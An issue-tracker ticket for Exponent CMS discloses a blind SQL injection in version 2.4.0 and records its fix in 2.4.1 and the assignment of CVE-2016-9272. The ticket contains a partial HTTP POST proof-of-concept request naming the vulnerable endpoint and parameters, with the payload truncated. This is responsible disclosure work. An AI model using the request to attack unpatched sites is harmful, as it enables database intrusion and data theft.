#1394 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 （4） - Exponent CMS

Type	To find
responsible:me	tickets assigned to you
tagged:"@high"	tickets tagged @high
milestone:next	tickets in the upcoming milestone
state:invalid	tickets with the state invalid
created:"last week"	tickets created last week
sort:number, importance, updated	tickets sorted by #, importance or updated
Combine keywords for powerful searching.
Use advanced searching »

#1394 ✓resolved

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 （4）

Reported by Nicky | November 6th, 2016 @ 07:46 AM | in 2.4.1 (closed)

POST /exponent/ HTTP/1.1
Content-Length: 268
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=4b42cc8b7f69ebe1afdcbf4abbfee00b; adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/untitled&model=container&rera...

Comments and changes to this ticket

dleffler November 6th, 2016 @ 10:50 AM
- Assigned user changed from “expNinja” to “dleffler”
- Milestone set to “2.4.1”
Appears to be a duplicate of #1395
expNinja November 6th, 2016 @ 10:53 AM
- State changed from “new” to “resolved”
(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c6039...
You flagged this item as spam.
Nicky November 9th, 2016 @ 03:13 AM
Hi
Can you help me to apply for a CVEID this vulnerability?
dleffler November 9th, 2016 @ 03:46 AM
Please visit http://cve.mitre.org/cve/request_id.html, I've not had much success since they've changed reporting methods from email submission to form submission.
You flagged this item as spam.
Nicky November 11th, 2016 @ 06:20 AM
Hi,
I have successfully applied for a CVEID（CVE-2016-9272） for this SQL injection vulnerability.

Credit:Nicky of Tencent Security Platform Department

Thank you.

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins (Sort)

↓↑ drag 337 Open tickets
↓↑ drag 775 Resolved tickets
↓↑ drag 0 This week's tickets

People watching this ticket

Referenced by

1395 Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 （5) (from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql...

Exponentcms Exponent CMS → 2.4.1

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 （4）

Comments and changes to this ticket

dleffler November 6th, 2016 @ 10:50 AM

expNinja November 6th, 2016 @ 10:53 AM

Nicky November 9th, 2016 @ 03:13 AM

dleffler November 9th, 2016 @ 03:46 AM

Nicky November 11th, 2016 @ 06:20 AM

Create your profile

Shared Ticket Bins (Sort)

People watching this ticket

Referenced by

Pages

Exponentcms Exponent CMS → 2.4.1

Keyword searching

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 （4）

Comments and changes to this ticket

dleffler November 6th, 2016 @ 10:50 AM

expNinja November 6th, 2016 @ 10:53 AM

Nicky November 9th, 2016 @ 03:13 AM

dleffler November 9th, 2016 @ 03:46 AM

Nicky November 11th, 2016 @ 06:20 AM

Create your profile

Shared Ticket Bins (Sort)

People watching this ticket

Referenced by

Pages